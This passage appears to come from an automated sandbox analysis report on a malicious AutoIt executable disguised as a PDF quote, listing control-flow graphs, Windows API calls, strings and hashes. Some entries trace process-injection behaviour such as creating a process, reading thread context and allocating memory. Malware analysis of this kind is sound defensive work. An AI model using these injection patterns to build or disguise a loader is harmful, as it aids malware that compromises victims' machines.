                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                    • API String ID: 1825951767-3513169116
                                                                    • Opcode ID: 602e4d6dc9a25a58e529bcb7dfa82959b1a210ed287622e2075159c77caa42f9
                                                                    • Instruction ID: a86551d7e15decc3aab4f59f2534b989ba3a8317aa1c90f01c6dc1814ff3dc7b
                                                                    • Opcode Fuzzy Hash: 602e4d6dc9a25a58e529bcb7dfa82959b1a210ed287622e2075159c77caa42f9
                                                                    • Instruction Fuzzy Hash: 25A1717295022D9ACF14EBE0EC91EEEB7B8BF14740F14252AF416B7192DF719A05CB60

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 952 1ab85e8-1ab8696 call 1ab6008 955 1ab869d-1ab86c3 call 1ab94f8 CreateFileW 952->955 958 1ab86ca-1ab86da 955->958 959 1ab86c5 955->959 967 1ab86dc 958->967 968 1ab86e1-1ab86fb VirtualAlloc 958->968 960 1ab8815-1ab8819 959->960 961 1ab885b-1ab885e 960->961 962 1ab881b-1ab881f 960->962 964 1ab8861-1ab8868 961->964 965 1ab882b-1ab882f 962->965 966 1ab8821-1ab8824 962->966 969 1ab886a-1ab8875 964->969 970 1ab88bd-1ab88d2 964->970 971 1ab883f-1ab8843 965->971 972 1ab8831-1ab883b 965->972 966->965 967->960 973 1ab86fd 968->973 974 1ab8702-1ab8719 ReadFile 968->974 977 1ab8879-1ab8885 969->977 978 1ab8877 969->978 979 1ab88e2-1ab88ea 970->979 980 1ab88d4-1ab88df VirtualFree 970->980 981 1ab8853 971->981 982 1ab8845-1ab884f 971->982 972->971 973->960 975 1ab871b 974->975 976 1ab8720-1ab8760 VirtualAlloc 974->976 975->960 983 1ab8762 976->983 984 1ab8767-1ab8782 call 1ab9748 976->984 985 1ab8899-1ab88a5 977->985 986 1ab8887-1ab8897 977->986 978->970 980->979 981->961 982->981 983->960 992 1ab878d-1ab8797 984->992 989 1ab88b2-1ab88b8 985->989 990 1ab88a7-1ab88b0 985->990 988 1ab88bb 986->988 988->964 989->988 990->988 993 1ab87ca-1ab87de call 1ab9558 992->993 994 1ab8799-1ab87c8 call 1ab9748 992->994 1000 1ab87e2-1ab87e6 993->1000 1001 1ab87e0 993->1001 994->992 1002 1ab87e8-1ab87ec CloseHandle 1000->1002 1003 1ab87f2-1ab87f6 1000->1003 1001->960 1002->1003 1004 1ab87f8-1ab8803 VirtualFree 1003->1004 1005 1ab8806-1ab880f 1003->1005 1004->1005 1005->955 1005->960
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01AB86B9
                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01AB88DF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1737160151.0000000001AB6000.00000040.00000020.00020000.00000000.sdmp, Offset: 01AB6000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_1ab6000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFileFreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 204039940-0
                                                                    • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                    • Instruction ID: 74921b2c4b8f765abeaca806f361ac526b8f6efe49337b1cc2c71b37f2d621b3
                                                                    • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                    • Instruction Fuzzy Hash: ACA12E74E00249EBDB14CFE8D994BEEBBB9BF48305F108159E601BB281D7799A40CF90

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1073 e639e7-e63a57 CreateWindowExW * 2 ShowWindow * 2
                                                                    APIs
                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E63A15
                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E63A36
                                                                    • ShowWindow.USER32(00000000,?,?), ref: 00E63A4A
                                                                    • ShowWindow.USER32(00000000,?,?), ref: 00E63A53
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CreateShow
                                                                    • String ID: AutoIt v3$edit
                                                                    • API String ID: 1584632944-3779509399
                                                                    • Opcode ID: 435921f4e4423fbce47a58ddf2bf7c9b0972f35e8d6150e1fc389f8735ac595c
                                                                    • Instruction ID: 539fdea6dd01ac9074f096d136c1b898f82266cb733bce72d5c1142fe50c70db
                                                                    • Opcode Fuzzy Hash: 435921f4e4423fbce47a58ddf2bf7c9b0972f35e8d6150e1fc389f8735ac595c
                                                                    • Instruction Fuzzy Hash: 40F03A70500298BEEB3057636C49E3B3E7DD7C7F60B00002AF904BA1F0C2710842EAB0

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1074 1ab83b8-1ab84e9 call 1ab6008 call 1ab82a8 CreateFileW 1081 1ab84eb 1074->1081 1082 1ab84f0-1ab8500 1074->1082 1083 1ab85a0-1ab85a5 1081->1083 1085 1ab8502 1082->1085 1086 1ab8507-1ab8521 VirtualAlloc 1082->1086 1085->1083 1087 1ab8523 1086->1087 1088 1ab8525-1ab853c ReadFile 1086->1088 1087->1083 1089 1ab853e 1088->1089 1090 1ab8540-1ab857a call 1ab82e8 call 1ab72a8 1088->1090 1089->1083 1095 1ab857c-1ab8591 call 1ab8338 1090->1095 1096 1ab8596-1ab859e ExitProcess 1090->1096 1095->1096 1096->1083
                                                                    APIs
                                                                      • Part of subcall function 01AB82A8: Sleep.KERNELBASE(000001F4), ref: 01AB82B9
                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01AB84DF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1737160151.0000000001AB6000.00000040.00000020.00020000.00000000.sdmp, Offset: 01AB6000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_1ab6000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFileSleep
                                                                    • String ID: C0UMAR0T00M2U54AU3W74G
                                                                    • API String ID: 2694422964-151420750
                                                                    • Opcode ID: 45ef42873558fe8a9d8b951cb0e5453c7cfae3ea47d33c941e32ed8664463b69
                                                                    • Instruction ID: 2ce6960e7ca563718a5b4cb2f02a941057eaf48143ea19d4210de9de6369c59b
                                                                    • Opcode Fuzzy Hash: 45ef42873558fe8a9d8b951cb0e5453c7cfae3ea47d33c941e32ed8664463b69
                                                                    • Instruction Fuzzy Hash: 4B518230D14289DAEF11DBB8C854BEEBBBCAF15304F044199E608BB2C1D7B91B45CBA5

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1098 e6410d-e64123 1099 e64200-e64204 1098->1099 1100 e64129-e6413e call e67b76 1098->1100 1103 e64144-e64164 call e67d2c 1100->1103 1104 e9d50d-e9d51c LoadStringW 1100->1104 1107 e9d527-e9d53f call e67c8e call e67143 1103->1107 1108 e6416a-e6416e 1103->1108 1104->1107 1117 e6417e-e641fb call e82f60 call e6463e call e82f3c Shell_NotifyIconW call e65a64 1107->1117 1120 e9d545-e9d563 call e67e0b call e67143 call e67e0b 1107->1120 1110 e64174-e64179 call e67c8e 1108->1110 1111 e64205-e6420e call e681a7 1108->1111 1110->1117 1111->1117 1117->1099 1120->1117
                                                                    APIs
                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00E9D51C
                                                                      • Part of subcall function 00E67D2C: _memmove.LIBCMT ref: 00E67D66
                                                                    • _memset.LIBCMT ref: 00E6418D
                                                                    • _wcscpy.LIBCMT ref: 00E641E1
                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E641F1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                    • String ID: Line:
                                                                    • API String ID: 3942752672-1585850449
                                                                    • Opcode ID: 2328bf10f0fb12452bae6dd680fce96176d2acb7f259b4cb86ebfc7fdda75ad4
                                                                    • Instruction ID: ab9795b2f7ceaa92a9db8e481f4062741f836a49487a2eb9fe208fb923496cb2
                                                                    • Opcode Fuzzy Hash: 2328bf10f0fb12452bae6dd680fce96176d2acb7f259b4cb86ebfc7fdda75ad4
                                                                    • Instruction Fuzzy Hash: 7331D171449308AED731EBA0EC46BDB77E8AF45758F10551EF188B20E1EB70AA49C793

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1485 e669ca-e669f1 call e64f3d 1488 e669f7-e66a05 call e64f3d 1485->1488 1489 e9e38a-e9e39a call ec9604 1485->1489 1488->1489 1496 e66a0b-e66a11 1488->1496 1492 e9e39f-e9e3a1 1489->1492 1494 e9e3c0-e9e408 call e80f36 1492->1494 1495 e9e3a3-e9e3a6 call e64faa 1492->1495 1506 e9e40a-e9e414 1494->1506 1507 e9e42d 1494->1507 1500 e9e3ab-e9e3ba call ec4339 1495->1500 1499 e66a17-e66a39 call e66bec 1496->1499 1496->1500 1500->1494 1509 e9e428-e9e429 1506->1509 1508 e9e42f-e9e442 1507->1508 1512 e9e5b9-e9e5bc call e82ed5 1508->1512 1513 e9e448 1508->1513 1510 e9e42b 1509->1510 1511 e9e416-e9e425 1509->1511 1510->1508 1511->1509 1516 e9e5c1-e9e5ca call e64faa 1512->1516 1514 e9e44f-e9e452 call e675e0 1513->1514 1519 e9e457-e9e479 call e65f12 call ec7492 1514->1519 1522 e9e5cc-e9e5dc call e67776 call e65efb 1516->1522 1529 e9e47b-e9e488 1519->1529 1530 e9e48d-e9e497 call ec747c 1519->1530 1536 e9e5e1-e9e611 call ebfad2 call e80fac call e82ed5 call e64faa 1522->1536 1532 e9e580-e9e590 call e6766f 1529->1532 1538 e9e499-e9e4ac 1530->1538 1539 e9e4b1-e9e4bb call ec7466 1530->1539 1532->1519 1542 e9e596-e9e5a0 call e674bd 1532->1542 1536->1522 1538->1532 1546 e9e4bd-e9e4ca 1539->1546 1547 e9e4cf-e9e4d9 call e65f8a 1539->1547 1549 e9e5a5-e9e5b3 1542->1549 1546->1532 1547->1532 1554 e9e4df-e9e4f7 call ebfa6e 1547->1554 1549->1512 1549->1514 1560 e9e4f9-e9e518 call e67f41 call e65a64 1554->1560 1561 e9e51a-e9e51d 1554->1561 1584 e9e53b-e9e549 call e65f12 1560->1584 1562 e9e54b-e9e54e 1561->1562 1563 e9e51f-e9e53a call e67f41 call e66999 call e65a64 1561->1563 1567 e9e56e-e9e571 call ec7428 1562->1567 1568 e9e550-e9e559 call ebf98f 1562->1568 1563->1584 1573 e9e576-e9e57f call e80fac 1567->1573 1568->1536 1576 e9e55f-e9e569 call e80fac 1568->1576 1573->1532 1576->1519 1584->1573
                                                                    APIs
                                                                      • Part of subcall function 00E64F3D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00F252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E64F6F
                                                                    • _free.LIBCMT ref: 00E9E5BC
                                                                    • _free.LIBCMT ref: 00E9E603
                                                                      • Part of subcall function 00E66BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E66D0D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                    • API String ID: 2861923089-1757145024
                                                                    • Opcode ID: e4e3d5e3c7f2a25fc7d3f54e283850deb5f9a74d6bc8728c16b09e9c59c97f97
                                                                    • Instruction ID: 7ebefd2362399bc82450d6a44885b0e4075104daecaee48e94f0ae437db2402b
                                                                    • Opcode Fuzzy Hash: e4e3d5e3c7f2a25fc7d3f54e283850deb5f9a74d6bc8728c16b09e9c59c97f97
                                                                    • Instruction Fuzzy Hash: 2A917B71A10219AFCF14EFA4DC919EDB7F4BF08354F14642AF915BB2A1EB31A905CB90
                                                                    APIs
                                                                      • Part of subcall function 00E802E2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E80313
                                                                      • Part of subcall function 00E802E2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00E8031B
                                                                      • Part of subcall function 00E802E2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E80326
                                                                      • Part of subcall function 00E802E2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E80331
                                                                      • Part of subcall function 00E802E2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00E80339
                                                                      • Part of subcall function 00E802E2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00E80341
                                                                      • Part of subcall function 00E76259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00E6FA90), ref: 00E762B4
                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E6FB2D
                                                                    • OleInitialize.OLE32(00000000), ref: 00E6FBAA
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00EA4921
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                    • String ID: %
                                                                    • API String ID: 1986988660-2291192146
                                                                    • Opcode ID: 40a3fdd227246aa2dfbce370c13de04bd4c5797a080b4fc67d817129f900de1f
                                                                    • Instruction ID: c9809126b074bd5481c969c1617fc182567a3e05d39a14b875c05449473b93fa
                                                                    • Opcode Fuzzy Hash: 40a3fdd227246aa2dfbce370c13de04bd4c5797a080b4fc67d817129f900de1f
                                                                    • Instruction Fuzzy Hash: 0B8108B0901A4CCFC3A4EF79FD65224BBE5FB98B16350912AD408DB272EB705486EF11
                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00E635A1,SwapMouseButtons,00000004,?), ref: 00E635D4
                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00E635A1,SwapMouseButtons,00000004,?,?,?,?,00E62754), ref: 00E635F5
                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,00E635A1,SwapMouseButtons,00000004,?,?,?,?,00E62754), ref: 00E63617
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID: Control Panel\Mouse
                                                                    • API String ID: 3677997916-824357125
                                                                    • Opcode ID: 5269c69f0216c52531b90bacea698e59576b485bb111eb6353e5a15e170141d7
                                                                    • Instruction ID: a833408c1ce662635ca4544b22a572c911fa043ef2d1b9c022b1143e6745b00b
                                                                    • Opcode Fuzzy Hash: 5269c69f0216c52531b90bacea698e59576b485bb111eb6353e5a15e170141d7
                                                                    • Instruction Fuzzy Hash: 60115A71550218BFDB20CF65EC84DEEB7B8EF04784F0054A9F805EB210D2719F449760
                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 01AB7A63
                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01AB7AF9
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01AB7B1B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1737160151.0000000001AB6000.00000040.00000020.00020000.00000000.sdmp, Offset: 01AB6000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_1ab6000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                    • String ID:
                                                                    • API String ID: 2438371351-0
                                                                    • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                                    • Instruction ID: 4ad9e4a5e62f6fecbfc94241d54e7874b60d50a123e101f11d759e3dce94e55a
                                                                    • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                                    • Instruction Fuzzy Hash: 61620D70A142589BEB24CFA4C850BDEB776EF58300F1091A9D10DEB3D1E7B99E81CB59
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                    • String ID:
                                                                    • API String ID: 2782032738-0
                                                                    • Opcode ID: c192cc0e54a8f9db57de2592849b4d8a529bf1476805975b929b304db04efb62
                                                                    • Instruction ID: 9bb7bd7fba1a79b5dca2eef2d75f6ae7e9d0657ad0a352dac1c90047c7ceec73
                                                                    • Opcode Fuzzy Hash: c192cc0e54a8f9db57de2592849b4d8a529bf1476805975b929b304db04efb62
                                                                    • Instruction Fuzzy Hash: 2541C7B16047479BDB2CEE69C8809AF7BA6EF84364B24953DF85DA76C0E670DD408B40
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID: AU3!P/$EA06
                                                                    • API String ID: 4104443479-182974850
                                                                    • Opcode ID: 727c278f27470193071fd7c0f37a2929dacc2e84ec7b4e8b633785f2000df25f
                                                                    • Instruction ID: ff2b8f5024b514c0130fa7020de95490338af81bda932d2ac2ce7c0607b1b167
                                                                    • Opcode Fuzzy Hash: 727c278f27470193071fd7c0f37a2929dacc2e84ec7b4e8b633785f2000df25f
                                                                    • Instruction Fuzzy Hash: 79419DB2B841585BCF219B64E851BFF7FE6AB01384F687065F842BF2C2C5229D4487E1
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00E9ED92
                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 00E9EDDC
                                                                      • Part of subcall function 00E648AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E648A1,?,?,00E637C0,?), ref: 00E648CE
                                                                      • Part of subcall function 00E80911: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E80930
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                                    • String ID: X
                                                                    • API String ID: 3777226403-3081909835
                                                                    • Opcode ID: 4b7e1599024e36a5994abfb45f7faa88c3c6b1e6cffd47024b57f4a71ed7ab87
                                                                    • Instruction ID: 6e6d52fa653a9ad72cdfad27e99155ac2c55ad43bf239617331d2addb08a37c7
                                                                    • Opcode Fuzzy Hash: 4b7e1599024e36a5994abfb45f7faa88c3c6b1e6cffd47024b57f4a71ed7ab87
                                                                    • Instruction Fuzzy Hash: 1721C370A0429C9BCF01DFA4D845BEE7BF89F49704F00405AE508BB242DFF459898BA1
                                                                    APIs
                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 00EC99A1
                                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00EC99B8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Temp$FileNamePath
                                                                    • String ID: aut
                                                                    • API String ID: 3285503233-3010740371
                                                                    • Opcode ID: 5ebb274a6e0a770df1c899bf3926b40f67efbc70c3b306591129500a54e7d312
                                                                    • Instruction ID: 8b01d068bb4a7202cd1df8cd0c99e0104d6590f8c4c4c9912d6d45d05b087ab8
                                                                    • Opcode Fuzzy Hash: 5ebb274a6e0a770df1c899bf3926b40f67efbc70c3b306591129500a54e7d312
                                                                    • Instruction Fuzzy Hash: 2FD05E7958030DAFDB509BA4DC8EFDA773CE708701F0002B1FB54A90A1EAB095998B92
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 35bfede92e9718eca1707a45a5496ecb3530f44869fe3467ffb4c64eac3a5bd0
                                                                    • Instruction ID: ee4e7aaddd1055d842562ba2fbff00d6e3211bb4b16060d27501575d5c5aea68
                                                                    • Opcode Fuzzy Hash: 35bfede92e9718eca1707a45a5496ecb3530f44869fe3467ffb4c64eac3a5bd0
                                                                    • Instruction Fuzzy Hash: 92F13B716083019FC714DF28C990A6ABBE5FF88354F14992EF899AB351D731E946CF82
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00E64401
                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E644A6
                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E644C3
                                                                    Memory Dump Source
